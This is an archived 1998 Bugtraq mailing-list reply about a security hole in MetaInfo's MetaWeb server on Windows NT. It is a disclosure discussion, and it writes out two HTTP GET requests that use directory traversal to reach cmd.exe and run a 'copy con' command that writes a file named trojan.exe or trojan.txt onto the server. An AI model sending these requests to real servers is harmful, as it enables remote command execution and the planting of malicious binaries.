Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1998_3

Bugtraq archives for 3rd quarter (Jul-Sep) 1998: Re: Security vulnerabilities in MetaInfo products

Re: Security vulnerabilities in MetaInfo products

pedwardWEBCOM.COM
Tue, 30 Jun 1998 13:18:02 -0700

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: der Mouse: "Re: patch for qpopper remote exploit bug"
Previous message: Theo de Raadt: "Re: Serious Linux 2.0.34 security problem"

> The MetaWeb server allows the running of NT batch/CMD files (this is how
> some
> of the Sendmail remote configuring works); if an attacker was to upload
> or produce a standard NT batch file, he could run any program he wishes.
>
>
> -Jeff Forristal

Ya know, the days of old where we had to use the COPY command to edit
the autoexec.bat come to mind:

An application that uses the following command could potentially upload a
binary to an NT server and run it:

GET ../../winnt/system32/cmd.exe?/c+copy+/b+con+c:\temp\trojan.exe HTTP/1.0

Or if you want to create a text file:

GET ../../winnt/system32/cmd.exe?/c+copy+con+c:\temp\trojan.txt HTTP/1.0

and terminate with a ^Z

Theoretically the commands above should work for the sendmail case that
Jeff explained.

--Perry

--
Perry Harrington        System Software Engineer    zelur xuniL  ()
http://www.webcom.com  perry.harringtonwebcom.com  Think Blue.  /\

Next message: der Mouse: "Re: patch for qpopper remote exploit bug"
Previous message: Theo de Raadt: "Re: Serious Linux 2.0.34 security problem"